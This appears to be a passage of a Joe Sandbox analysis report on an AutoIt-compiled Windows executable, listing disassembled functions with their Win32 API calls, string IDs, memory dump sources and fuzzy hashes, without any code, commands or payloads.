                                                                                              • Opcode ID: 604483d8cf52b089fb9ca7e7fbb29a3cbdbb366c252dc1b59e7bf35c29b55501
                                                                                              • Instruction ID: 9d299ca69a05c5635f8cf31a96e6fa2b80c54c3652504dcc678661c62bc75f1f
                                                                                              • Opcode Fuzzy Hash: 604483d8cf52b089fb9ca7e7fbb29a3cbdbb366c252dc1b59e7bf35c29b55501
                                                                                              • Instruction Fuzzy Hash: FF61C2702096429FD720DF54C498F95BBE6AF44318F18848CE4664B7A3C775EC86CBD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00624284
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00624299
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006242B3
                                                                                              • _wcslen.LIBCMT ref: 006242F8
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00624325
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00624353
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 2147712094-78025650
                                                                                              • Opcode ID: e8fa6f20b0a2e76eb6eb7a56eb8fb0151cac5cfeed9685e3941b19f4636f8863
                                                                                              • Instruction ID: fb7d71ee9714dff4eea3537baa871c46f4eeb7e814cfa72a5dede3d70d473d89
                                                                                              • Opcode Fuzzy Hash: e8fa6f20b0a2e76eb6eb7a56eb8fb0151cac5cfeed9685e3941b19f4636f8863
                                                                                              • Instruction Fuzzy Hash: 0341CF31A00729EBDB21DF65DC49BEA7BAAFF48350F10052AF954E7291DB709984CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FC5D9
                                                                                              • IsMenu.USER32(00000000), ref: 005FC5F9
                                                                                              • CreatePopupMenu.USER32 ref: 005FC62F
                                                                                              • GetMenuItemCount.USER32(016D59D8), ref: 005FC680
                                                                                              • InsertMenuItemW.USER32(016D59D8,?,00000001,00000030), ref: 005FC6A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: 079a100efde40880d39c9a20bd3cc73c31963b6372b92e0dbec9164075a64906
                                                                                              • Instruction ID: 79d69c2d74c1bdedbd39123c96536ad8c164a59cdbec2dda9de96914e135b95f
                                                                                              • Opcode Fuzzy Hash: 079a100efde40880d39c9a20bd3cc73c31963b6372b92e0dbec9164075a64906
                                                                                              • Instruction Fuzzy Hash: 7851CE70A0420DABDB21DF6CCA88ABEBFF5BF44314F145539E611EB2A1D7789944CB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 005FD0D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-404129466
                                                                                              • Opcode ID: 6c267b36e8ebf9f2c30a1caecbee2c0c835bba38ca22f7af8cec3f0a1870f100
                                                                                              • Instruction ID: cf9823c2af9b8a9003f7acb24f8cd601e5c62f262c0be5ca886966b6659696ab
                                                                                              • Opcode Fuzzy Hash: 6c267b36e8ebf9f2c30a1caecbee2c0c835bba38ca22f7af8cec3f0a1870f100
                                                                                              • Instruction Fuzzy Hash: 0A11DB3534870BBEE7205714AC8ACFA6FFDFF19310F60001AFA0066282FE69AD054574
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 642191829-3771769585
                                                                                              • Opcode ID: 190e93429b6f2750c489a9d6cbeefcba9dd4e7d4e248b389a02cd47429fe5bc1
                                                                                              • Instruction ID: 7ae535c159cb88c9172a304968be9e9a29b437ec578ede0321d659b6d425b8f4
                                                                                              • Opcode Fuzzy Hash: 190e93429b6f2750c489a9d6cbeefcba9dd4e7d4e248b389a02cd47429fe5bc1
                                                                                              • Instruction Fuzzy Hash: 6011B43190021A6FDB3477649C4FEEE7B7CFF80710F210165F645920A2EF789A819A50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2610073882-625585964
                                                                                              • Opcode ID: adc4bdb63693ff2ce5433d7fcb280282f239e5f5743140865af772d9de2306fe
                                                                                              • Instruction ID: 583afcfc426adf2ab459da60f4a0d3adbea24fc106ae53ada98a85f105f4a25d
                                                                                              • Opcode Fuzzy Hash: adc4bdb63693ff2ce5433d7fcb280282f239e5f5743140865af772d9de2306fe
                                                                                              • Instruction Fuzzy Hash: 0D919171A00619EFDF20CFA4C845FDEBBB9EF85715F148159F506AB280D7709986CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006142C8
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006143D7
                                                                                              • _wcslen.LIBCMT ref: 006143E7
                                                                                              • VariantClear.OLEAUT32(?), ref: 0061457C
                                                                                                • Part of subcall function 006015B3: VariantInit.OLEAUT32(00000000), ref: 006015F3
                                                                                                • Part of subcall function 006015B3: VariantCopy.OLEAUT32(?,?), ref: 006015FC
                                                                                                • Part of subcall function 006015B3: VariantClear.OLEAUT32(?), ref: 00601608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4137639002-1221869570
                                                                                              • Opcode ID: 5f632985a8386a037feb95465a1804fbf2173c52a36255bff4116bb9d22554c0
                                                                                              • Instruction ID: 1ae1179aa5f01cd012bb6b829d342489e167404a4d730fe6866dcaf943b0543d
                                                                                              • Opcode Fuzzy Hash: 5f632985a8386a037feb95465a1804fbf2173c52a36255bff4116bb9d22554c0
                                                                                              • Instruction Fuzzy Hash: 5D917C746083029FCB04DF24C5859AABBE6FF89314F18892DF8899B351DB30ED46CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 00622AE2
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00622B14
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00622B3C
                                                                                              • _wcslen.LIBCMT ref: 00622B72
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00622BAC
                                                                                              • GetSubMenu.USER32(?,?), ref: 00622BBA
                                                                                                • Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
                                                                                                • Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
                                                                                                • Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00622C42
                                                                                                • Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 4196846111-0
                                                                                              • Opcode ID: c9ed3fd5190051fe1eb0f61ac18102c1a9eaa6b7a0dfc1f25fc031d0ebeaf6ba
                                                                                              • Instruction ID: 9bf6b64aed5f6b938e67f7279a8770ae9468c2e4c5f835b30f1ed4b4af0d34c9
                                                                                              • Opcode Fuzzy Hash: c9ed3fd5190051fe1eb0f61ac18102c1a9eaa6b7a0dfc1f25fc031d0ebeaf6ba
                                                                                              • Instruction Fuzzy Hash: 73718E75A00616AFCB10EF64D855AAEBBF6FF88310F148458E816AB351DB74ED42CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00628896
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 006288A2
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0062897D
                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 006289B0
                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 006289E8
                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00628A0A
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00628A22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: b4c143d293a9ee08b4f36c73e8a71c0ff19d43fa21397f3fdd8d6da1351bbc86
                                                                                              • Instruction ID: c014c14416446d316c36845ad87212e6a2111cadd6cce34daa647f95f1da4837
                                                                                              • Opcode Fuzzy Hash: b4c143d293a9ee08b4f36c73e8a71c0ff19d43fa21397f3fdd8d6da1351bbc86
                                                                                              • Instruction Fuzzy Hash: 3971BC34A02A25AFEF218F54EC94FFA7BBAEF49300F140459E84597361CB35A991CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 005B30DB
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 005B30E3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 005B3171
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 005B319C
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 005B31F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 68de633979019d316c1738e9baed0c789ccdb6ed6569a0e18b379d67db0c12df
                                                                                              • Instruction ID: 5045ea5504e8d9d4c068bb39dd5d3d853eb36ab39e2e29469e04eb3792eba873
                                                                                              • Opcode Fuzzy Hash: 68de633979019d316c1738e9baed0c789ccdb6ed6569a0e18b379d67db0c12df
                                                                                              • Instruction Fuzzy Hash: 51414E34A00219ABCB10DF6CC849AEEBFB9BF45364F148555E8157B392D731AB15CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F80D1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F80F7
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 005F80FA
                                                                                              • SysAllocString.OLEAUT32 ref: 005F811B
                                                                                              • SysFreeString.OLEAUT32 ref: 005F8124
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 005F813E
                                                                                              • SysAllocString.OLEAUT32(?), ref: 005F814C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 27f82f676f4ed9327711f417cdd5af03517170699ee0ef743cb1b09de23ba468
                                                                                              • Instruction ID: da4f0cbfeae0d81bfc8fc72c39a8b22b03a2c9fb2cbd0d2a23364f14fd8aa278
                                                                                              • Opcode Fuzzy Hash: 27f82f676f4ed9327711f417cdd5af03517170699ee0ef743cb1b09de23ba468
                                                                                              • Instruction Fuzzy Hash: 69218B712001096FDF10AFA8DC88CBA7BEDFB493607008525FA15CB290DA74EC46CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00600DAE
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600DEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: 93cccf4164a3bf805e39dddaa22bc0981790b158b013260fc23ecc99ae0e4546
                                                                                              • Instruction ID: e3dc87b4b9dc5239608cef9d4e6469c70ede499a8e013a2fc08f86d1e3ac7856
                                                                                              • Opcode Fuzzy Hash: 93cccf4164a3bf805e39dddaa22bc0981790b158b013260fc23ecc99ae0e4546
                                                                                              • Instruction Fuzzy Hash: FE216B74540306EFEB248F69DC04B9BBBA6AF45721F204E19F9A1E72E0D7709951CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00600E82
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600EBD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: e8e581aa43c89b2c3c07468c140a7725a039106cee7f16009a36a08e7556fd61
                                                                                              • Instruction ID: ebe18f29f152a99a4ff3059c2b9a97ad7321477a5b2697bcd8b061b83c8162ec
                                                                                              • Opcode Fuzzy Hash: e8e581aa43c89b2c3c07468c140a7725a039106cee7f16009a36a08e7556fd61
                                                                                              • Instruction Fuzzy Hash: 3A217A71544346ABEB349F28DC04B9BB7AAEF55724F200A19FDA1E32E0D7709D41DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00597759
                                                                                                • Part of subcall function 0059771B: GetStockObject.GDI32(00000011), ref: 0059776D
                                                                                                • Part of subcall function 0059771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00597777
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00624A71
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00624A7E
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00624A89
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00624A98
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00624AA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: dc47c1946e0828c91094e999cfd82f723be17e65a1fd84877f9d7d7fa75cb561
                                                                                              • Instruction ID: 852a29fa568159e6d6658e4a166c0c14b719007b04b05f16ad357eca175575e0
                                                                                              • Opcode Fuzzy Hash: dc47c1946e0828c91094e999cfd82f723be17e65a1fd84877f9d7d7fa75cb561
                                                                                              • Instruction Fuzzy Hash: EE11B6B115011EBEEF118F64DC85EE77FAEEF08798F014111FA14A2150CA719C21DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005FE23D
                                                                                              • LoadStringW.USER32(00000000), ref: 005FE244
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005FE25A
                                                                                              • LoadStringW.USER32(00000000), ref: 005FE261
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005FE2A5
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 005FE282
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 4072794657-3128320259
                                                                                              • Opcode ID: 7fe6bc4372b5adca21aab0fae00de7c4c3a9a758616ec932f2980c20b03d2d0b
                                                                                              • Instruction ID: 19b70e2270696fe50a5bd8372ae7dab2bc7e6f0966bddebfa8f7c5c07ef6022b
                                                                                              • Opcode Fuzzy Hash: 7fe6bc4372b5adca21aab0fae00de7c4c3a9a758616ec932f2980c20b03d2d0b
                                                                                              • Instruction Fuzzy Hash: 290186F690020C7FE7109B94DD8DEFB776DE708301F004591B746E2041E6749E858B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00601237
                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00601249
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00601257
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00601265
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00601274
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00601284
                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 0060128B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
